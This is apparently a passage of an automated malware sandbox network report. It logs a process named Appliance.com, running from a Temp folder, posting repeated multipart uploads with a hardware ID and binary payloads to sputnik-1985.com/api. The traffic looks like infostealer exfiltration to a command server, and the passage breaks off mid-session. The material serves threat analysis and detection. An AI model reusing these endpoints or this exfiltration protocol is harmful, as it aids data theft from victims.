                                                                                                                                          2025-01-10 11:06:25 UTC1369INData Raw: 34 6e 56 67 76 56 4d 53 69 77 34 4e 63 78 6d 4b 63 32 2b 77 47 37 49 72 69 71 64 43 56 2f 46 50 2b 52 55 70 42 65 31 69 6f 4f 33 58 54 54 47 39 42 32 75 53 51 7a 52 47 61 49 35 37 52 71 46 47 6e 71 66 36 6b 6b 49 2b 67 54 62 4a 49 53 51 49 72 46 61 67 35 61 74 31 54 61 31 58 44 34 5a 58 4c 56 4e 78 6e 6b 38 54 6e 41 75 32 52 34 61 2f 66 6c 65 5a 66 39 45 46 45 52 48 39 59 36 33 30 6e 31 46 6b 76 43 34 6a 46 67 63 35 58 77 33 4b 73 7a 75 68 59 70 34 65 6e 74 70 43 58 34 68 53 71 44 30 68 4f 65 56 69 75 4e 32 2f 55 51 6d 35 66 7a 4f 2b 57 78 31 6a 51 5a 6f 76 62 37 67 66 6e 6c 2b 65 67 33 49 4c 67 55 66 4a 44 42 51 77 7a 55 72 4e 7a 50 35 4e 77 65 46 4f 49 2f 64 58 61 45 64 4e 76 32 5a 47 6f 42 75 71 4b 35 61 44 51 6b 65 31 51 2b 55 68 44 52 48 4a 57 72 6a
                                                                                                                                          Data Ascii: 4nVgvVMSiw4NcxmKc2+wG7IriqdCV/FP+RUpBe1ioO3XTTG9B2uSQzRGaI57RqFGnqf6kkI+gTbJISQIrFag5at1Ta1XD4ZXLVNxnk8TnAu2R4a/fleZf9EFERH9Y630n1FkvC4jFgc5Xw3KszuhYp4entpCX4hSqD0hOeViuN2/UQm5fzO+Wx1jQZovb7gfnl+eg3ILgUfJDBQwzUrNzP5NweFOI/dXaEdNv2ZGoBuqK5aDQke1Q+UhDRHJWrj
                                                                                                                                          2025-01-10 11:06:25 UTC1369INData Raw: 4c 77 75 49 36 5a 50 4d 51 39 46 71 6b 63 33 68 43 65 4f 53 35 4b 6a 51 6c 65 4e 52 39 6b 46 42 52 58 4e 5a 70 44 52 76 33 45 56 76 58 49 69 73 32 38 52 4a 6c 44 76 5a 36 65 4d 66 78 70 62 69 76 5a 43 50 6f 45 32 79 53 45 6b 43 4b 78 57 6c 4f 6d 62 62 54 32 4e 62 7a 50 43 62 79 46 6a 62 59 70 62 4a 36 77 6a 74 6b 50 75 70 30 4a 76 6d 55 2f 70 4c 53 31 42 79 57 75 74 39 4a 39 52 5a 4c 77 75 49 30 34 33 45 56 74 73 68 73 4d 37 7a 43 4f 32 62 34 71 4f 51 6a 36 42 4e 73 6b 68 4a 41 69 73 56 70 6a 39 71 31 31 4e 6a 55 38 6a 72 6e 4d 6c 44 32 32 79 55 79 75 67 4d 39 5a 6e 37 6f 4e 75 56 37 56 44 39 51 45 6c 4b 65 52 58 6c 63 32 44 4c 41 54 63 54 35 4f 47 4b 79 52 50 7a 65 59 2f 4f 35 42 6a 73 6c 65 58 76 7a 39 37 33 46 50 56 44 42 52 6f 7a 56 61 6f 2b 64 64 5a
                                                                                                                                          Data Ascii: LwuI6ZPMQ9Fqkc3hCeOS5KjQleNR9kFBRXNZpDRv3EVvXIis28RJlDvZ6eMfxpbivZCPoE2ySEkCKxWlOmbbT2NbzPCbyFjbYpbJ6wjtkPup0JvmU/pLS1ByWut9J9RZLwuI043EVtshsM7zCO2b4qOQj6BNskhJAisVpj9q11NjU8jrnMlD22yUyugM9Zn7oNuV7VD9QElKeRXlc2DLATcT5OGKyRPzeY/O5BjsleXvz973FPVDBRozVao+ddZ
                                                                                                                                          2025-01-10 11:06:25 UTC1369INData Raw: 71 4b 4b 78 45 43 55 4f 34 2f 5a 2f 77 37 34 31 76 44 76 31 35 79 75 44 4c 4a 45 53 6b 78 2b 58 71 38 36 59 74 74 43 61 6c 62 43 37 70 66 43 57 64 31 70 6e 4d 7a 75 41 2b 53 57 35 71 37 63 6c 4f 64 61 2b 77 38 4c 41 6e 52 4e 36 32 73 6e 35 56 46 6f 53 38 58 79 32 66 46 53 78 58 4b 4d 78 50 67 50 70 62 66 71 6f 39 4f 56 36 55 53 79 55 41 74 62 4d 31 4b 6e 63 7a 2b 54 51 57 74 66 79 2b 57 56 7a 46 7a 62 5a 4a 4c 47 34 67 66 31 6c 2b 79 6e 33 4a 6a 6a 52 76 68 46 56 30 74 36 57 4b 55 37 64 64 41 42 49 52 50 50 2b 74 75 62 45 65 5a 70 6d 73 58 2b 42 4f 6a 59 39 75 48 4a 30 4f 6c 59 73 68 63 46 55 47 46 56 6f 44 4e 67 33 56 4e 75 57 38 66 6f 6d 38 56 61 33 6d 43 51 7a 65 59 41 34 5a 6e 6b 72 74 47 51 36 31 54 37 58 55 67 43 50 52 57 73 4b 79 65 4c 41 56 68 66
                                                                                                                                          Data Ascii: qKKxECUO4/Z/w741vDv15yuDLJESkx+Xq86YttCalbC7pfCWd1pnMzuA+SW5q7clOda+w8LAnRN62sn5VFoS8Xy2fFSxXKMxPgPpbfqo9OV6USyUAtbM1Kncz+TQWtfy+WVzFzbZJLG4gf1l+yn3JjjRvhFV0t6WKU7ddABIRPP+tubEeZpmsX+BOjY9uHJ0OlYshcFUGFVoDNg3VNuW8fom8Va3mCQzeYA4ZnkrtGQ61T7XUgCPRWsKyeLAVhf
                                                                                                                                          2025-01-10 11:06:25 UTC1369INData Raw: 73 42 6d 69 4f 64 32 4b 68 52 74 38 71 79 2b 6f 50 48 76 67 62 74 41 56 77 43 5a 52 58 7a 59 53 6d 54 55 79 38 4c 69 4b 57 59 30 55 50 53 59 49 2f 4b 72 7a 66 5a 75 4f 4b 6a 30 35 7a 76 55 37 49 42 42 55 30 7a 44 5a 4a 7a 5a 4d 46 54 49 45 4c 65 37 34 76 45 48 64 78 79 6c 4d 57 6f 52 36 66 55 37 61 54 63 6c 65 6c 45 76 56 31 56 53 58 39 44 35 7a 64 31 6b 77 38 76 51 73 50 74 69 63 31 57 6d 33 4b 50 78 50 67 4b 34 70 2b 6c 70 38 47 64 34 68 53 38 44 31 42 4a 66 31 4f 6d 4a 69 6a 43 56 32 78 46 7a 36 36 54 30 6c 7a 59 49 36 61 48 71 42 47 6e 77 4b 6d 61 30 35 37 67 55 2b 52 65 43 47 4a 34 57 61 67 2f 5a 74 51 42 49 52 50 4f 6f 73 4f 51 48 35 52 6e 69 49 6d 77 57 62 58 44 76 50 79 48 77 4c 78 4c 76 46 59 46 56 44 4d 4e 2b 58 30 6e 77 51 45 33 45 34 2f 68 69
                                                                                                                                          Data Ascii: sBmiOd2KhRt8qy+oPHvgbtAVwCZRXzYSmTUy8LiKWY0UPSYI/KrzfZuOKj05zvU7IBBU0zDZJzZMFTIELe74vEHdxylMWoR6fU7aTclelEvV1VSX9D5zd1kw8vQsPtic1Wm3KPxPgK4p+lp8Gd4hS8D1BJf1OmJijCV2xFz66T0lzYI6aHqBGnwKma057gU+ReCGJ4Wag/ZtQBIRPOosOQH5RniImwWbXDvPyHwLxLvFYFVDMN+X0nwQE3E4/hi
                                                                                                                                          2025-01-10 11:06:25 UTC1369INData Raw: 74 6d 74 76 36 44 2b 53 4f 36 75 6a 75 72 73 74 5a 2f 30 70 4c 52 55 31 72 69 6a 6c 33 33 6b 35 6f 62 66 62 56 69 73 52 42 6c 6b 57 61 33 2b 74 4a 71 64 6a 78 37 34 6a 51 7a 31 37 69 51 6b 70 46 4d 78 76 72 4e 79 65 4c 41 55 70 65 78 65 65 56 78 42 50 31 61 59 6e 45 35 77 36 6e 31 71 6d 6a 6b 4d 69 75 56 66 68 66 53 45 31 30 47 61 77 70 59 4a 4d 50 4c 31 32 49 75 74 76 43 57 38 52 75 6c 73 36 6b 44 2b 6d 57 71 62 43 65 69 61 35 43 73 68 63 57 44 44 4e 48 36 32 73 6e 6c 45 39 69 55 73 76 73 6d 4e 46 44 30 6d 43 50 79 71 38 33 32 62 33 6b 6f 74 57 65 36 57 72 4d 62 6b 39 53 66 6c 71 73 63 55 66 55 56 32 78 74 39 74 57 4b 78 45 47 57 52 5a 72 66 36 30 6d 70 32 50 48 76 69 4e 44 50 58 75 4a 43 53 6b 55 78 64 61 77 6c 5a 4a 4d 50 4c 31 65 49 75 74 76 6d 58 4e
                                                                                                                                          Data Ascii: tmtv6D+SO6ujurstZ/0pLRU1rijl33k5obfbVisRBlkWa3+tJqdjx74jQz17iQkpFMxvrNyeLAUpexeeVxBP1aYnE5w6n1qmjkMiuVfhfSE10GawpYJMPL12IutvCW8Ruls6kD+mWqbCeia5CshcWDDNH62snlE9iUsvsmNFD0mCPyq832b3kotWe6WrMbk9SflqscUfUV2xt9tWKxEGWRZrf60mp2PHviNDPXuJCSkUxdawlZJMPL1eIutvmXN


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.449740104.21.64.14434504C:\Users\user\AppData\Local\Temp\19152\Appliance.com
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-10 11:06:25 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=K7ZWZ85O1CBNYMQQ8
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 18164
                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                          2025-01-10 11:06:25 UTC15331OUTData Raw: 2d 2d 4b 37 5a 57 5a 38 35 4f 31 43 42 4e 59 4d 51 51 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 39 31 37 35 38 46 35 46 43 34 39 41 38 44 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 4b 37 5a 57 5a 38 35 4f 31 43 42 4e 59 4d 51 51 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 37 5a 57 5a 38 35 4f 31 43 42 4e 59 4d 51 51 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39
                                                                                                                                          Data Ascii: --K7ZWZ85O1CBNYMQQ8Content-Disposition: form-data; name="hwid"0291758F5FC49A8DE9E2F0D64B3B48BA--K7ZWZ85O1CBNYMQQ8Content-Disposition: form-data; name="pid"2--K7ZWZ85O1CBNYMQQ8Content-Disposition: form-data; name="lid"HpOoIh--3fe7f419
                                                                                                                                          2025-01-10 11:06:25 UTC2833OUTData Raw: cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b
                                                                                                                                          Data Ascii: xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{
                                                                                                                                          2025-01-10 11:06:26 UTC1131INHTTP/1.1 200 OK
                                                                                                                                          Date: Fri, 10 Jan 2025 11:06:26 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=135dpe2hcis15k4t4hpddfs3mg; expires=Tue, 06 May 2025 04:53:05 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrybH0NmA8RnhNMTJEB1x%2FGw2hwDjENNWQL%2Fpk8Ch8ul%2BAtQVxAFc7kV%2FKhRib387dlrd78Kcu6vh0d6ZZnRZpvkPwOJfHzIJNlP4TOCgKetRXpgOkurUJvbG%2Bgqry7Fbb%2F1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ffc3298684d42e9-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1672&rtt_var=653&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2840&recv_bytes=19125&delivery_rate=1643218&cwnd=240&unsent_bytes=0&cid=c97e050cdf07163d&ts=662&x=0"
                                                                                                                                          2025-01-10 11:06:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                          2025-01-10 11:06:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.449741104.21.64.14434504C:\Users\user\AppData\Local\Temp\19152\Appliance.com
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-10 11:06:27 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=46BGISZ6K1JZ
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 8755
                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                          2025-01-10 11:06:27 UTC8755OUTData Raw: 2d 2d 34 36 42 47 49 53 5a 36 4b 31 4a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 39 31 37 35 38 46 35 46 43 34 39 41 38 44 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 34 36 42 47 49 53 5a 36 4b 31 4a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 36 42 47 49 53 5a 36 4b 31 4a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 34 36 42 47 49 53 5a
                                                                                                                                          Data Ascii: --46BGISZ6K1JZContent-Disposition: form-data; name="hwid"0291758F5FC49A8DE9E2F0D64B3B48BA--46BGISZ6K1JZContent-Disposition: form-data; name="pid"2--46BGISZ6K1JZContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--46BGISZ
                                                                                                                                          2025-01-10 11:06:27 UTC1121INHTTP/1.1 200 OK
                                                                                                                                          Date: Fri, 10 Jan 2025 11:06:27 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=h77bih3t3e7v1iotvjreg6a6qi; expires=Tue, 06 May 2025 04:53:06 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6599s7dDZ5WDxbEy9SMX2An95310K6f8Xhj6%2FGnC321aVJ%2BdxqWAycfhvby8RxWOGNDUy9H9ntpW5Bzal2KDd7PINxRY8I1cURSDGVAcyAvZRp4tBLm9TDMUdO5AiIDtdasw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ffc329ff975de95-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1639&min_rtt=1635&rtt_var=622&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2841&recv_bytes=9688&delivery_rate=1748502&cwnd=242&unsent_bytes=0&cid=7c4291fad84a4432&ts=469&x=0"
                                                                                                                                          2025-01-10 11:06:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                          2025-01-10 11:06:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.449742104.21.64.14434504C:\Users\user\AppData\Local\Temp\19152\Appliance.com
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-10 11:06:28 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=K7J331VRLLP83P6P
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 20432
                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                          2025-01-10 11:06:28 UTC15331OUTData Raw: 2d 2d 4b 37 4a 33 33 31 56 52 4c 4c 50 38 33 50 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 39 31 37 35 38 46 35 46 43 34 39 41 38 44 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 4b 37 4a 33 33 31 56 52 4c 4c 50 38 33 50 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 37 4a 33 33 31 56 52 4c 4c 50 38 33 50 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36
                                                                                                                                          Data Ascii: --K7J331VRLLP83P6PContent-Disposition: form-data; name="hwid"0291758F5FC49A8DE9E2F0D64B3B48BA--K7J331VRLLP83P6PContent-Disposition: form-data; name="pid"3--K7J331VRLLP83P6PContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a36
                                                                                                                                          2025-01-10 11:06:28 UTC5101OUTData Raw: 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00
                                                                                                                                          Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                          2025-01-10 11:06:28 UTC1127INHTTP/1.1 200 OK
                                                                                                                                          Date: Fri, 10 Jan 2025 11:06:28 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=d8r689lhavqkikujukufhnvdve; expires=Tue, 06 May 2025 04:53:07 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GRzR9%2FBo5iDu2ckGA9ZIynP%2BmPAJGnvsxszkiKglhmdSArwmkAaS1ZNpuWj8Rfwyrvrj%2F0JKiYbkrEyfUTdNnbmAg6MEdP03EBdqEdiTTGXrR7bsrAoIOEpK5BQwRYhfsPS%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ffc32a769797c6a-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1929&rtt_var=727&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21392&delivery_rate=1501285&cwnd=218&unsent_bytes=0&cid=bac2d0c43e75822b&ts=657&x=0"
                                                                                                                                          2025-01-10 11:06:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                          2025-01-10 11:06:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.449743104.21.64.14434504C:\Users\user\AppData\Local\Temp\19152\Appliance.com
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-10 11:06:29 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=UUC0SH7V04Z9YMTETJP
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 1290
                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                          2025-01-10 11:06:29 UTC1290OUTData Raw: 2d 2d 55 55 43 30 53 48 37 56 30 34 5a 39 59 4d 54 45 54 4a 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 39 31 37 35 38 46 35 46 43 34 39 41 38 44 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 55 55 43 30 53 48 37 56 30 34 5a 39 59 4d 54 45 54 4a 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 55 43 30 53 48 37 56 30 34 5a 39 59 4d 54 45 54 4a 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66
                                                                                                                                          Data Ascii: --UUC0SH7V04Z9YMTETJPContent-Disposition: form-data; name="hwid"0291758F5FC49A8DE9E2F0D64B3B48BA--UUC0SH7V04Z9YMTETJPContent-Disposition: form-data; name="pid"1--UUC0SH7V04Z9YMTETJPContent-Disposition: form-data; name="lid"HpOoIh--3f
                                                                                                                                          2025-01-10 11:06:30 UTC1128INHTTP/1.1 200 OK
                                                                                                                                          Date: Fri, 10 Jan 2025 11:06:30 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=r1lgfh66rhcn7uf04mmrr39dt7; expires=Tue, 06 May 2025 04:53:08 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=90wzZSKkNcfliApXnLkyse7%2BLs5%2BCYr8i9LAUf5xGj7%2F%2BJxarJub%2BdfaPekrRk6TN8NEFgTfPYshinafmU3PwNE%2Fcshss3t7LPDLnoElYiilNzBVNJeuOCrP4V3AG5tUdxvX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ffc32af8a258ca1-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1963&rtt_var=747&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2208&delivery_rate=1454907&cwnd=168&unsent_bytes=0&cid=b85ff89b220d0042&ts=449&x=0"
                                                                                                                                          2025-01-10 11:06:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                          2025-01-10 11:06:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.449744104.21.64.14434504C:\Users\user\AppData\Local\Temp\19152\Appliance.com
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-10 11:06:30 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=N7PIYC5OW1AEA03O2
